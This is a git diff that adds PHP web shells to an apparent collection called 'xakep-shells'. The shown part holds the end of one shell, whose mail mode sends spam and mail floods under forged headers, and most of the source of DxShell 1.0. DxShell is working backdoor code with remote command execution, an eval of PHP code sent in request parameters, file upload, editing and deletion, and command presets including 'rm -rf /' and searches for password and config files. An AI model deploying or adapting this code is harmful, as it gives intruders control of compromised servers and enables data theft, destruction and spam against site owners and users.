+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{	if (!isset($_GET['dxparam']))
+		{
+		print '';		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/xakep-shells/PHP/DxShell.php.php.txt b/xakep-shells/PHP/DxShell.php.php.txt
new file mode 100644
index 0000000..ae829e5
--- /dev/null
+++ b/xakep-shells/PHP/DxShell.php.php.txt
@@ -0,0 +1,2031 @@
+<?php
+$GLOB['SHELL']['USER']['Login']='';
+$GLOB['SHELL']['USER']['Passw']=''; /* pwd. "as is", or md5() possible */
+
+/*
+  DDDDD        SSSSS    DxShell    by �_� Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ# 1227-700
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = @escapeshellarg($f);
+			return @trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{	if ($DXGLOBALSHIT)
+		{		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
